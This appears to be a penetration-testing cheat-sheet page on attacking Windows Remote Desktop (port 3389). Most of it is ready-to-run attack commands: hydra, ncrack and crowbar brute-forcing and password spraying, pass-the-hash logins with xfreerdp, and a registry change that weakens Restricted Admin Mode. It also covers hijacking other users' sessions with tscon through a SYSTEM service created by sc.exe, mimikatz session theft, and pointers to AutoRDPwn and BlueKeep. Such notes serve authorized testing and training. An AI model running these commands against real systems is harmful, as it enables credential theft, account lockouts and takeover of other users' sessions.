Skip to content

Port 3389 - Remote Desktop Protocol (RDP)

Sources for these notes

Description

Basic information about RDP service: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).

Name Description
port 3389/TCP
state open
service ms-wbt-server
version Microsoft Terminal Services
Banner rdp-ntlm-info

RDP works at the application layer in the TCP/IP reference model, typically utilizing TCP port 3389 as the transport protocol. However, the connectionless UDP protocol can use port 3389 also for remote administration. The Remote Desktop service is installed by default on Windows servers and does not require additional external applications. This service can be activated using the Server Manager and comes with the default setting to allow connections to the service only to hosts with Network level authentication (NLA).

Enumeration

Footprinting the service:

nmap -Pn -p3389 $ip 

rdp-sec-check.pl

rdp-sec-check.pl is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).

git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check

./rdp-sec-check.pl $ip

Connection with rdp

To run Microsoft’s Remote Desktop Protocol (RDP) client, a command-line interface called Microsoft Terminal Services Client (MSTSC) is used. We can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina and interact with the GUI of the server accordingly.

xfreerdp

See xfreerdp.

We can first try to form an RDP session with the target by not providing any additional information for any switches other than the target IP address. This will make the script use your own username as the login username for the RDP session, thus testing guest login capabilities.

xfreerdp /v:$ip
# /v:$ip: Specifies the target IP of the host we would like to connect to.

Try to login with other default accounts, such as user, admin, Administrator, and so on. We will also be specifying to the script that we would like to bypass all requirements for a security certificate so that our own script does not request them:

xfreerdp /cert:ignore /u:Administrator /v:$ip
# /cert:ignore : Specifies to the scrips that all security certificate usage should be ignored.
# /u:Administrator : Specifies the login username to be "Administrator".
# /v:$ip: Specifies the target IP of the host we would like to connect to.

If successful, during the initialization of the RDP session, we will be asked for a password. We can hit Enter to see if the process continue without one. Sometimes there are severe mishaps in configurations like this and we can gain access.

If you know user and credentials:

xfreerdp /u:<username> /p:<"password"> /v:$ip 
xfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip

#Pass the hash
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip 

Troubleshoot in PtH attack

Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

rdesktop

See rdesktop.

rdesktop -u <username> $ip
rdesktop -d <domain> -u <username> -p <password> $ip

Attacks

Password guessing

rdp_check.py from Impacket

Since RDP takes user credentials for authentication, one common attack vector against the RDP protocol is password guessing. There is a tool for checking known credentials against RDP services.

rdp_check.py from impacket let you check if some credentials are valid for a RDP service:

rdp_check <domain>/<name>:<password>@$ip

Brute force

Just think it twice: in many cases, a user account will be locked or disabled after a certain number of failed login attempts.

ncrack

ncrack -vv --user <User> -P pwds.txt rdp://$ip

hydra

hydra -V -f -L <userslist> -P <passwlist> rdp://$ip

hydra -L user.list -P password.list rdp://$ip

Password Spraying

Be careful, you could lock accounts.

Crowbar

See crowbar.

# https://github.com/galkan/crowbar
crowbar -b rdp -s $ip/32 -U users.txt -c 'password123'

Hydra

See hydra.

# hydra
hydra -L usernames.txt -p 'password123' $ip rdp

RDP Session Hijacking

With SYSTEM privileges you can access any opened RDP session by any user without the need of knowing the password of the owner.

Then, in Powershell, get opened sessions:

query user

Access to the selected session:

tscon <ID> /dest:<SESSIONNAME>

Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.

Important: When you access an active RDP sessions you will kickoff the user that was using it.

You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...).

Mimikatz Session Hijacking

You could also use mimikatz to steal a session:

ts::sessions #Get sessions
ts::remote /id:2 #Connect to the session

Sticky-keys & Utilman Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

PsExec for escalating privileges: This method no longer works on Server 2019

PsExec is particularly effective for privilege escalation because it can create and run processes with SYSTEM privileges, even if executed from an Administrator account. Here’s how this process typically works:

  • Command Execution as SYSTEM: When using PsExec with the -s flag (e.g., psexec -s cmd.exe), it launches a process that runs with SYSTEM privileges instead of the Administrator privileges of the account running it.
  • How It Works Internally: PsExec does this by leveraging Windows services, which typically run as SYSTEM by default. PsExec creates a temporary service on the machine to launch a command or program with SYSTEM privileges, then removes the service after completion.
  • Escalation Path: Once PsExec launches a command prompt or other executable with SYSTEM privileges, the user essentially has unrestricted access. This enables them to perform actions that would other

Example of an exploitation: creating a service that will run as SYSTEM

query user

Results:

 USERNAME              SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
>juurena               rdp-tcp#13          1  Active          7  8/25/2021 1:23 AM
 lewen                 rdp-tcp#14          2  Active          *  8/25/2021 1:28 AM
sc.exe create Nameofservice binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"

Explanation: Create a Windows service that, by default, run as Local System and will execute any binary with SYSTEM privileges. We use Microsoft sc.exe binary. First, we specify the service name (Nameofservice) and the binpath, which is the command we want to execute. Once we run the following command, a service named Nameofservice will be created.

Initiate the service:

net start Nameofservice

Once the service is started, a new terminal with the lewen user session will appear. With this new account, we can attempt to discover what kind of privileges it has on the network, and maybe we'll get lucky, and the user is a member of the Help Desk group with admin rights to many hosts or even a Domain Admin.

RDP with PtH attack

xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip
# /pth:<hash>   Pass the hash

Trobleshooting: Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.

DoS

To check the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).

nmap uses RDPcookies (mstshash=nmap) to interact with the RDP server. These cookies can be identified by security services such as EDRs, and can lock us out, so we need to think twice before running that scan.

nmap -Pn -sV -p3389 --script rdp-*  $ip

Results:

PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-enum-encryption:
|   Security layer
|     CredSSP (NLA): SUCCESS
|     CredSSP with Early User Auth: SUCCESS
|_    RDSTLS: SUCCESS
| rdp-ntlm-info:
|   Target_Name: EXPLOSION
|   NetBIOS_Domain_Name: EXPLOSION
|   NetBIOS_Computer_Name: EXPLOSION
|   DNS_Domain_Name: Explosion
|   DNS_Computer_Name: Explosion
|   Product_Version: 10.0.17763
|_  System_Time: 2022-11-11T12:16:26+00:00
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

RDP Process Injection

If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him.

RDP Sessions Abuse

# Adding User to RDP group
net localgroup "Remote Desktop Users" UserLoginName /add

Shadow Attack

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

https://github.com/JoelGMSec/AutoRDPwn

Bluekeep

In 2019, a critical vulnerability was published in the RDP (TCP/3389) service that also led to remote code execution (RCE) with the identifier CVE-2019-0708.

A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

Last update: 2024-11-01
Created: January 1, 2023 21:59:36